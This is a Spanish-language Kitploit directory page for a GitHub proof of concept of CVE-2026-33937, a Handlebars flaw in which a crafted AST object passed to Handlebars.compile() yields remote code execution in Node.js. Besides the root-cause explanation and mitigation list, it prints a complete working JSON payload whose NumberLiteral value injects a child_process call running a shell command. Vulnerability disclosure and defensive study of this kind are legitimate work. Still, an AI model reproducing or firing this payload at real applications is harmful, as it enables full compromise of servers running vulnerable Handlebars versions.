Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2026-33937 — Prueba de concepto del exploit para CVE-2026-33937, una vulnerabilidad de inyección en el AST de Handlebars que conduce a la ejecución remota de código en Node.js. Demuestra payloads de AST manipulados y proporciona orientación de mitigación. | Kitploit
Herramientas/GitHubGitHub/dinhvaren/cve-2026-33937
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebDesarrollo de Payloads
GitHubdinhvaren/cve-2026-33937

cve-2026-33937

Prueba de concepto del exploit para CVE-2026-33937, una vulnerabilidad de inyección en el AST de Handlebars que conduce a la ejecución remota de código en Node.js. Demuestra payloads de AST manipulados y proporciona orientación de mitigación.

Ver Repositorio
hace 3 mesesAún no revisado
Sitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-33937 - PoC de explotación RCE en Handlebars

Descripción

CVE-2026-33937 es una vulnerabilidad crítica de Ejecución Remota de Código (RCE) en Handlebars causada por el manejo inseguro de la entrada del Árbol de Sintaxis Abstracta (AST).

La vulnerabilidad permite a los atacantes inyectar código JavaScript arbitrario al proporcionar un objeto AST manipulado a Handlebars.compile().

Causa raíz

Handlebars.compile() acepta tanto:

  • Cadena de plantilla
  • Objeto AST pre-analizado

Cuando se proporciona un objeto AST, se omite la fase de análisis.

Dentro de:

root@kitploit:~

lib/handlebars/compiler/javascript-compiler.js

La función:

root@kitploit:~
NumberLiteral(number) {
  this.pushStackLiteral(number.value);
}

inserta directamente number.value en el código JavaScript generado , lo que conduce a la inyección de código.

sin saneamiento ni escape

Impacto

  • Ejecución Remota de Código (RCE)
  • Compromiso total del servidor
  • Ejecución arbitraria de JavaScript en el entorno Node.js

Flujo de explotación

root@kitploit:~
Atacante → AST manipulado (JSON)
        │
        ▼
Handlebars.compile()
        │
        ▼
Compiler.compile()
        │
        ▼
JavaScriptCompiler (inyección NumberLiteral)
        │
        ▼
Generación de código
        │
        ▼
new Function(...) / eval()
        │
        ▼
       RCE

Prueba de Concepto (PoC)

root@kitploit:~
{
  "type": "Program",
  "body": [
    {
      "type": "MustacheStatement",
      "path": {
        "type": "PathExpression",
        "data": false,
        "depth": 0,
        "parts": ["lookup"],
        "original": "lookup",
        "loc": null
      },
      "params": [
        {
          "type": "PathExpression",
          "data": false,
          "depth": 0,
          "parts": [],
          "original": "this",
          "loc": null
        },
        {
          "type": "NumberLiteral",
          "value": "{},{})) + process.getBuiltinModule('child_process').execFileSync('id').toString() //",
          "original": 1,
          "loc": null
        }
      ],
      "escaped": true,
      "strip": { "open": false, "close": false },
      "loc": null
    }
  ],
  "strip": {},
  "loc": null
}

Versiones afectadas

  • Handlebars <= 4.7.8

Mitigación

  • No permitir entrada AST no confiable
  • Validar y sanear todas las entradas de plantillas
  • Actualizar a la versión parcheada de Handlebars

Referencias

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-33937
Descargar herramienta